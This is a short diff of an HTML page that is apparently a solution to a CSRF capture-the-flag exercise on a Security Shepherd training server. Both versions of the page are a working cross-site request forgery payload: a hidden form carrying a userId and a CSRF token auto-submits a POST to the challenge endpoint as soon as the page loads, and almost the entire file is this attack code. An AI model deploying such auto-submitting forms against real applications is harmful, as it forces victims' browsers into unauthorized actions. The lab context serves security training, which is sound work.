--- a/index.html
+++ b/index.html
@@ -5,36 +5,16 @@
     </head>
 
     <body>
-        <h1>Crazydais - CSRF 3</h1>
+        <form id="csrf" action="https://shepherd.waratek.lan/user/csrfchallengethree/plusplus" method="POST" >
+            <input type="hidden" name="userId" value="fcab4e7dfbe01ce4e3904b97febe6a6a184302c3" />
+            <input type="hidden" name="csrfToken" value="-161699926159196303063208050832052286748" />
+        </form>
+
         <script>
             (function () {
-                console.log('Invoking CSRF 3');
-                var csrf = '-161699926159196303063208050832052286748';
-                var userId = 'fcab4e7dfbe01ce4e3904b97febe6a6a184302c3';
-                var form = createForm(userId, csrf);
+                var form = document.getElementById("csrf");
                 form.submit();
-
             })();
-
-            function addInputToForm(form, name, value) {
-                console.log('Add input', name, value)
-                // Create a hidden input element, and append it to the form
-                var input = document.createElement('input');
-                input.type = 'hidden';
-                input.name = name;
-                input.value = value;
-                form.appendChild(input);
-            }
-
-            function createForm(id, csrf) {
-                var form = document.createElement('form');
-                form.id = "csrf-form";
-                form.action = 'https://shepherd.waratek.lan/user/csrfchallengethree/plusplus';
-                form.method = 'POST';
-                addInputToForm(form, 'userId', id);
-                addInputToForm(form, 'csrfToken', csrf);
-                return form;
-            }
         </script>
     </body>
 </html>
